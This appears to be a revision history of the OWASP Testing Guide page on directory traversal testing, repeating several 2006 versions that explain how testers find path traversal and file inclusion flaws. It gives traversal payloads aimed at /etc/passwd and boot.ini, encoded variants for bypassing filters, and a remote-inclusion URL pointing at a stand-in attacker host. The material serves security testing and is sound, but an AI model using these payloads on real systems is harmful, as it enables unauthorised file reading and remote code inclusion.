root directory: "/"
directory separator: "/"
</pre>

''Windows OS'':
<pre>
root directory: "<drive letter>:\"
directory separator: "\" but also "/"
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac OS'':
<pre>
root directory: "<drive letter>:"
directory separator: ":"
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:17:12Z

Ikkisoft: /* Gray Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like OS'':
<pre>
root directory: "/"
directory separator: "/"
</pre>

''Windows OS'':
<pre>
root directory: "<drive letter>:\"
directory separator: "\" but also "/"
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac OS'':
<pre>
root directory: "<drive letter>:"
directory separator: ":"
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:11:08Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like OS'':
<pre>
root directory: "/"
directory separator: "/"
</pre>

''Windows OS'':
<pre>
root directory: "<drive letter>:\"
directory separator: "\" but also "/"
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac OS'':
<pre>
root directory: "<drive letter>:"
directory separator: ":"
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:05:19Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:03:53Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous example, the dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

